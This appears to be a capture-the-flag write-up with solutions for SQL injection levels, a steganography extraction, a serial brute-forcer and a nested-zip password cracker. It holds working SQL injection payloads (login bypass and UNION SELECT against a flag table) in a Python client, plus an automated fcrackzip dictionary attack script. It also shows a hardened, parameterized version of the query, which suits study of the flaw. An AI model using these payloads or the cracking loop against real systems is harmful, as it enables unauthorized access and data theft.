====== Challenges Misc 1 and 2 ======
<code>
root@kali:~/Downloads# python client.py
[+] Test level1 ...
Welcome on level 1 !
Welcome b'admin" OR "1"="1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 ...
Welcome on level 2 !
Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}
</code>
**Source code: client.py**
<code python>
#encoding: utf-8
import socket
import sys

# change this if needed
HOST = '192.168.1.19'
# change this if needed
PORT = 8096


def create_socket():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect((HOST, PORT))
    except Exception as e:
        print("Can't open socket !")
        print(e)
        sys.exit(1)
    return s


def test_level1():
    print("[+] Test level1 ...")
    s = create_socket()
    login = 'admin" OR "1"="1'
    password = 'toto" OR "1"="1" LIMIT "1" OFFSET "2'
    # Message format: level byte 0x01, login, NUL separator, password
    cmd = "\x01%s\x00%s" % (login, password)
    s.send(cmd.encode('utf-8'))
    msg = s.recv(1024)
    if msg and msg.decode('utf-8').startswith("Welcome"):
        print(msg.decode('utf-8'))
        res = s.recv(1024)
        print(res.decode('utf-8'))
    else:
        print("If you called a valid level, notice an admin")
    s.close()


def test_level2():
    print("[+] Test level2 ...")
    s = create_socket()
    citation = '123 union SELECT * fROM flag'
    # Message format: level byte 0x02 followed by the citation id
    # (encode the str first: bytes % str raises TypeError on Python 3)
    s.send(b"\x02" + citation.encode('utf-8'))
    msg = s.recv(1024)
    if msg and msg.decode('utf-8').startswith("Welcome"):
        print(msg.decode('utf-8'))
        res = s.recv(1024)
        print(res.decode('utf-8'))
    else:
        print("If you called a valid level, notice an admin")
    s.close()


if __name__ == '__main__':
    test_level1()
    print("")
    test_level2()
</code>
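The level 2 payload in client.py only works if the server pastes the citation id into its SQL text. The sketch below is an added example, not the challenge's server code: the ''citations''/''flag'' schema, the query and the function names are assumptions, and the flag value is a constructed placeholder. It puts the string-built query next to a validated, bound-parameter version.

```python
import sqlite3

# Level 2 input taken from client.py on this page.
PAYLOAD = "123 union SELECT * fROM flag"


def make_db():
    # Constructed sample data; the real server schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE citations (id INTEGER PRIMARY KEY, text TEXT);
        CREATE TABLE flag (value TEXT);
        INSERT INTO citations VALUES (1, 'constructed citation');
        INSERT INTO flag VALUES ('ESE{constructed_placeholder}');
    """)
    return db


def lookup_vulnerable(db, citation):
    # The input becomes part of the SQL text, so the parser treats
    # "union SELECT ..." as a second query whose rows are returned too.
    query = "SELECT text FROM citations WHERE id = %s" % citation
    return [row[0] for row in db.execute(query)]


def lookup_hardened(db, citation):
    # 1) Reject anything that is not an integer id.
    try:
        citation_id = int(citation)
    except ValueError:
        return []
    # 2) Bind the value: it is passed as data and never parsed as SQL.
    rows = db.execute("SELECT text FROM citations WHERE id = ?", (citation_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable),
                     ("hardened", lookup_hardened)):
        print(name, "id=1    ->", fn(db, "1"))
        print(name, "payload ->", fn(db, PAYLOAD))
```

The same binding approach applies to the level 1 login and password fields, which are strings and therefore need no integer check, only placeholders.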
====== Stegano challenge ======
The goal was to find a file hidden in the image below.
Just run this command :p and you get the flag: binwalk --dd='.*' special-k.png
{{:challenge_stegano_ctf_mssis_special-k.png|}}
====== serial ======
Find serials that satisfy the following Python code:
<code python>
import random, string


def are_same(serial):
    # True if at least two of the three characters are equal
    if (serial[0] != serial[1] and
            serial[1] != serial[2] and
            serial[0] != serial[2]):
        return False
    return True


def check_serial(serial):
    try:
        serials = serial.split('-')
    except:
        return False
    if len(serials) != 3:
        return False
    try:
        X = [ord(a) for a in list(serials[0])]
        Y = [ord(a) for a in list(serials[1])]
        Z = int(serials[2])
    except ValueError:
        return False
    except:
        return False
    if not len(X) == 3 or not len(Y) == 3:
        return False
    for a in X+Y:
        #print(a)
        # => uppercase letters only (A-Z)
        if a < 65 or a > 90:
            return False
    if are_same(X) or are_same(Y):
        return False
    if X[1] + 10 > X[2]:
        return False
    if Y[1] - 10 < Y[2]:
        return False
    sum1 = X[0] + X[1] + X[2]
    sum2 = Y[0] + Y[1] + Y[2]
    if sum1 == sum2:
        return False
    if sum1+sum2 != Z:
        return False
    if Z % 3 != 0:
        return False
    return True
</code>
Instead of searching for values by hand, I brute-forced with this code:
<code python>
# Appended to the file above (uses its imports and check_serial)
while 1:
    x = ''.join(random.choice(string.ascii_uppercase) for _ in range(3))
    y = ''.join(random.choice(string.ascii_uppercase) for _ in range(3))
    z = ''.join(random.choice(string.digits) for _ in range(3))
    s = "%s-%s-%s" % (x, y, z)
    print(s)
    if check_serial(s):
        print(s)
        break
exit()
</code>
Example flag: DGR-GVH-450
====== deeper ======
A zip archive that contains a zip that contains a zip .... with passwords :/
Bash code to automate the task:
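<code bash>
#!/bin/bash
# $1: name of the zip file passed as argument
file=$1
test=true
count=1
while $test; do
    echo "test $count : $file"
    # $file is left unquoted on purpose: the name parsed from unzip's output
    # ends with a space, and word splitting drops it
    file $file | grep 'Zip'
    if [ "$?" -eq "0" ]; then
        echo "ZIP ok"
        # Dictionary attack; fcrackzip prints "PASSWORD FOUND!!!!: pw == <pass>"
        r=$(fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt $file)
        pass=$(echo $r | awk -F"== " '{print $2}')
        echo "pass is : $pass"
        # Extract and take the name of the inner file as the next target
        file=$(unzip -P "$pass" $file | grep -E 'extracting|inflating' | awk -F": " '{print $2}')
        echo "new file [$file]"
        count=$(($count+1))
    else
        test=false
    fi
done
</code>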
Output:
<code>
root@kali:~/deeper# ./run.sh 8KLifFpoUdbxXB5noGIG.zip.start
test 1 : 8KLifFpoUdbxXB5noGIG.zip.start
8KLifFpoUdbxXB5noGIG.zip.start: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : AC020307
new file [6TF2INzK1as0vC4hmGVW.zip ]
test 2 : 6TF2INzK1as0vC4hmGVW.zip
6TF2INzK1as0vC4hmGVW.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : tiagia4
new file [BYJrsoCOfTlWehfvNoBU.zip ]
test 3 : BYJrsoCOfTlWehfvNoBU.zip
BYJrsoCOfTlWehfvNoBU.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : jesipato
new file [uBKIeGWEztQN7FwsSr6b.zip ]
test 4 : uBKIeGWEztQN7FwsSr6b.zip
uBKIeGWEztQN7FwsSr6b.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : benk2007benk
new file [exhNdH5BI2Hr0lV99EEs.zip ]
test 5 : exhNdH5BI2Hr0lV99EEs.zip
exhNdH5BI2Hr0lV99EEs.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : 02456035
...
</code>